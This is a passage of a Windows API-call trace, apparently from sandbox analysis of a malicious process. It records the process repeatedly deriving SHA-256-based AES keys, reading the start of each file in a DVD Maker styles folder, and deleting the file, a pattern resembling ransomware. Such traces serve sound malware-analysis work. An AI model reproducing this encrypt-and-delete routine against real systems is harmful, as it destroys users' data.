phKey=0x326b254*=0x284d528) returned 1 [0143.157] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0143.157] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0143.159] CryptDestroyHash (hHash=0x284d568) returned 1 [0143.159] CryptDestroyKey (hKey=0x284d528) returned 1 [0143.159] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0143.160] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_selectionsubpicture.png")) returned 0 [0143.162] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0143.162] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.163] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.163] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.163] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.163] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0143.163] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.168] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.168] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.168] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.169] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\1047x576black.png")) returned 0 [0143.169] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.170] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.170] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.170] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.170] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb05 [0143.170] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.172] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.172] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.172] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.173] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\15x15dot.png")) returned 0 [0143.174] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.174] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.174] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.174] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.174] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x183b [0143.175] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.179] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.179] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.180] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.181] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\decorative_rule.png")) returned 0 [0143.181] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.182] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.182] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.182] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.182] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0143.182] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.184] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.184] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.184] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.186] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_buttongraphic.png")) returned 0 [0143.189] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.189] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.189] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.189] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.189] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0143.189] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.191] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.191] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.191] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.193] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_selectionsubpicture.png")) returned 0 [0143.193] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.193] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.193] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.193] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.193] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0143.193] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.196] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.196] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.196] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.197] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_buttongraphic.png")) returned 0 [0143.198] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.198] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.198] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.198] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.198] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0143.198] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.232] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.232] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.232] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.234] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_selectionsubpicture.png")) returned 0 [0143.234] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.235] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.235] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.235] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.235] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0143.235] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.237] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.237] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.237] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.239] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_buttongraphic.png")) returned 0 [0143.239] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.239] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.239] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.240] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.240] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0143.240] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.242] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.242] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.242] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.243] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_selectionsubpicture.png")) returned 0 [0143.244] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.244] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.244] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.244] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.244] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c8d [0143.244] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.248] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.248] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.248] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.250] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\vintage.png")) returned 0 [0143.251] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0143.252] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.253] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.253] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.253] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.253] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xeef [0143.253] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.256] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.256] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.256] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.257] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\720x480blacksquare.png")) returned 0 [0143.258] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.258] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.258] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.258] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.258] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1168 [0143.258] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.266] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.266] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.266] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.267] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttonicon.png")) returned 0 [0143.280] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.280] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.280] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.280] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.280] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc04 [0143.280] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.283] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.283] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.283] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.284] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttoniconsubpictur.png")) returned 0 [0143.285] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.285] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.285] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.285] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.285] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa942c [0143.285] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.350] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.350] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.350] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.351] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop.wmv")) returned 0 [0143.351] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.352] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.352] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.352] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.352] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbebec [0143.352] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.403] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.403] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.403] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.409] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop_pal.wmv")) returned 0 [0143.409] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.410] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.410] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.410] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.410] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11ad [0143.410] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.413] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.413] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.413] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.414] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttonicon.png")) returned 0 [0143.414] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.415] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.415] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.415] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.415] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbef [0143.415] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.417] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.417] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.417] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.418] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttoniconsubpict.png")) returned 0 [0143.419] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.419] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.419] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.419] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.419] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x629b [0143.419] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.423] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.423] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.423] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.424] DeleteFileW (lpFileName="C:\\Program Files\\DVD 